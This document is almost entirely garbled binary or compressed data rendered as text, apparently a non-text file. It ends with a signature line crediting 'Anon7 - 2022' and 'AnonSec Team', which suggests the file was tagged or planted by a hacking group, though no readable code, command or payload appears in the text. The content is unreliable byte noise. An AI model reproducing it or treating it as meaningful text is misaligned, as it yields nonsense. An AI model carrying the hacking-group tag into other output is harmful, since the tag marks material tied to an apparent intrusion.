F2̦V?V=~ShMvխibכ[RALĬz%Y"L\H5x8Kƽ,),J	e-)!M҄UBy{r4M;}kд0ZxRޯfۯ!Lѻ]-/Ǘ74!1Z8nˋ{:ۤȈ6JjȻD4vkͶ%rڍ$XhFTzi%*$_7N4;{8cxcCFJ
A~-<dj周ב[NT`Uzq06ib¹&=)JE[णK}^O9}z-:DN
rԼ|ϝ\n]nJ@S6@=쟞6CQPpn͊{?it7k"Ÿ"qXitQ뽩A-!66 Do	+Lzӷ&k]uQc1rx8-gѧ1nW d$V
:iz;
"ld_p~ˀ$mo(M茽/+s~53lE^)6(|{`o\eOu6/_FȄ
#2≧/z[,8ULT-g{PgT	޹`˭52c24iw/b.4 v${f:$QǵtwT>с@ůfbɭ[P?f<cش
 K5.RSQ+i=S/mx	:j Ty^R#4u
6ŴHqIkm{By.Ucijp<ZjUվL?Iߕ
ŅxϥlgK|T򄸋 F5R!/}ςv.li­w~S"W,ݷ aw#be1m$0xTSXS1սFJISZԣ8S'+l*[g4fjԑΨދTu }k[Hc IZT6	8O$t3#*-cy,vj[SGA?h!t6>b58 #q_zZKu,B<&HSx].'@L ^myo,ŠA5PRVпn]шML47/P뛆Wq=
56WGӉ<DPEur7(#|>iUOYlFLkD^,=87dL>[wzW&	6CafpOCwUndyS8kxMS&9DJ:|&lҙV7ѻ1vVaik+㎛˓fwpcyc#N/"gzǕ<몲7	[P7)56Μdﳾ߰V!W}g&"?_l4qRw8;p,3v×A2e`o"7S2d<
);&ĦP\AAAAx#mGGtj.P!T!܎FTGFk9i!'+$d	&(ӛR$zz$h@N
Qp0,yfx̂a߱1_
(Iڝ
צGc"ƭU텲KNIv	y c'k(cHRC.P!n_0~
edW_AGw9k8MS+5U;wTFЎѰtDA :nZj:{n:A?Ǡ|&A;RPtn;z):-#Vg;l3$wQ%%,mu43%g*MTB7ѷn%l\Rn#gI}0~u=	QZ籹fL=(iAc"{)
?-
۵ӝ<OD\|}hqj,7:'7Jܪٝm7X2*e2u

sKXe3x]ICYqېB(L, +"      3Y
$̃_dfPnwCD~[|MLϓZ?:p>`֓۔8{\M foZ[ON$5wql81g`JO(ӝN'S_?GIv$)${}kGv7`Rw1y^?~YX1]ܖbcH5Wl%VOp1B
*|;fY$s_V[(ݔ>zҬSE~7pqI!~xtc;d޷32%9tjMd(FcN02UufW)|YuʌK/ƲBD2ъ$u#dJ*3Z߄WC+\1aߺת.8''K`Y* ^r,g2M.T
<hJeU`LV-ڥb1}<ax:ŢwP߅Zo&uJf.eog`WĊ]q."LJNf 5/i]d$^84ur[fFf&Ur[T`Ž)MTuɺR\M+E=VFRqHǪu1bK"|Uʰ|-u$2IP;7o| @^=<(MIa$<Y߿XŸ	튮ʦ&C
eJl!q B~N"h[k#8Q{kQk"nJǛp̟Ɩ{q=7S)JBؔtc
Fʪk ԔڡY=5_mZeK<]/ɫReTy+	\+>Y(Ktb2Auv⁶W*g@*%Rs'
?"2W
톱ܙR3Pf#C^@H!ت\Fe_]Dhsz6ƆZ[	5hv^oQN"VEFJ8"v_IsbrĺHbGVD˾-c	PpuRΫ?5NCs</$	<*4ıUJs9^W3q\HK((BdB@FxŵD'buwJ	`=bDZl [
;r\Ă!ȔQ>Gd!	m2z7Ύo8G.9LטWjh5U\/
҇6eޥX4¬u*a3*EKv$-`WsWj;@>bIy]k=֋hV2\UpŽ.C[#:h"EdCv5<٦0[u圖尙.{|IF]YU!7Gp)#>|s'eUtu{|f$@Xݠ}:bӟ4 bCcnxmAwn3+"R+\rrY)HZJ
%{2GQW@u'Y>	 :x0!^STWstfGwBn,nhm׉Y|O	ɸ\?4jqCrg'%)ye.{,to,Ǫ]_x]X d"/BS<eh$o	`_yiaQ5~σd(<
I :4kةd?B"j4h@ȹ'<O)ą! 46b '1#9br59iZ?M&6;59/gDusϝw*}\7N>Yح]N6m=CP?lϝo;ǜ6o`f0>O+aN'0͏;`S~Xی8˴b͉]IDs=GO'eM!C 70?Qv/6i;R
ODNpU&bG!]:^D?q^ɴ~@z@2^Ŀt3ހDy-	
%7Ɓ<7L}!	/mO{0Iinz'ϹPP|=ʬ%8
-AxVXʆC/9q=3S1*[vE/	a0tnZmbN?_$8Ax<o"Ш‰!Ǝd %L:
|A{Oٟe(.~ǩJyԀY9_3?'JGF?DHT(R؉3G%&̈18}g$+Dv*}ؽkG-h 1a	H4xDn8D]"Ev2{<?30NPώ	L3B~hW뎾!?#YmQhc\'Mbv`(vDe8v                        !(Q;T6$L7

Anon7 - 2022
AnonSec Team